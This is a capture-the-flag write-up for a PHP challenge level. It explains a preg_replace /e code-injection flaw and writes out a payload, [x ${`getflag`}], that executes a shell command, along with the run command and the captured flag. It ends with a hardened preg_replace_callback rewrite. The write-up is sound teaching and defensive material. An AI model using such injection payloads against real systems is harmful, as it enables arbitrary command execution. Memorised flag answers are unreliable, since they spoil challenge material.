stages.md

File metadata and controls

32 lines (29 loc) · 1.29 KB

level06

  1. We are given the level06 binary executable and the PHP script level06.php:
```php
#!/usr/bin/php
<?php
	function y($m)
	{
		$m = preg_replace("/\./", " x ", $m);
		$m = preg_replace("/@/", " y", $m);
		return $m;
	}

	function x($y, $z)
	{
		$a = file_get_contents($y);
		$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
		$a = preg_replace("/\[/", "(", $a);
		$a = preg_replace("/\]/", ")", $a);
		return $a;
	}

	$r = x($argv[1], $argv[2]);
	print $r;
?>
```
  2. The code takes a filename as input, loads the contents of that file, transforms it and prints the result to the console.
  3. A short search shows that preg_replace() is vulnerable when used with the /e modifier: the replacement string (with the captured text substituted in) is evaluated as PHP code before the result is written back into the input.
  4. Create /tmp/php_exploit. Its content is a string that, once it matches the `\[x (.*)\]` pattern and is evaluated, runs the getflag shell command. The needed string is ``[x ${`getflag`}]`` (the backticks make PHP execute it as a shell command).
  5. Running `./level06 /tmp/php_exploit` prints the flag for level07: wiok45aaoguiboiki2tuin6ub
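The root cause in step 3 is that `/e` turns the replacement into PHP source, so the captured group lands inside a double-quoted PHP string where `${...}` and backticks are interpreted. The fix is to drop `/e` and use preg_replace_callback(), which hands the capture to a function as plain data. The block below is an added example written for this writeup, not the challenge's own code; `x_safe()` and the two sample inputs are constructed for illustration. Note that PHP 7.0 removed `/e` entirely (it was deprecated in 5.5), so on a current interpreter the original level06.php emits an "Unknown modifier 'e'" warning and returns NULL rather than executing anything.

```php
<?php
// Hardened rewrite of x()/y() from level06.php (added example, not the
// level's code). preg_replace_callback() replaces the /e modifier: the
// captured text reaches y() as an ordinary string and is never evaluated.

function y(string $m): string
{
    $m = preg_replace("/\./", " x ", $m);
    $m = preg_replace("/@/", " y", $m);
    return $m;
}

// Same pattern and same rewriting rules as the original x(), minus the
// file read and minus /e. $match[2] is data, whatever characters it holds.
function x_safe(string $input): string
{
    $a = preg_replace_callback(
        "/(\[x (.*)\])/",
        function (array $match): string {
            return y($match[2]);
        },
        $input
    );
    $a = preg_replace("/\[/", "(", $a);
    $a = preg_replace("/\]/", ")", $a);
    return $a;
}

// Constructed inputs (not taken from the challenge files).
// Single quotes keep PHP from interpolating anything in the literal.
$benign  = '[x user@example.com]';
$hostile = '[x ${`getflag`}]';   // the payload from step 4; inert here

echo x_safe($benign), "\n";   // the @ and . rewrites applied, nothing executed
echo x_safe($hostile), "\n";  // the payload text is echoed back unchanged
```

Run it with `php hardened.php` (any filename). With the callback the hostile line comes back as the literal text `${`getflag`}`: there is no eval step, so there is nothing for the shell-exec backticks to run. The same pattern applies to any legacy code still relying on `/e`: every `preg_replace("/.../e", ...)` call has a direct preg_replace_callback() equivalent with a closure that does what the replacement expression used to do.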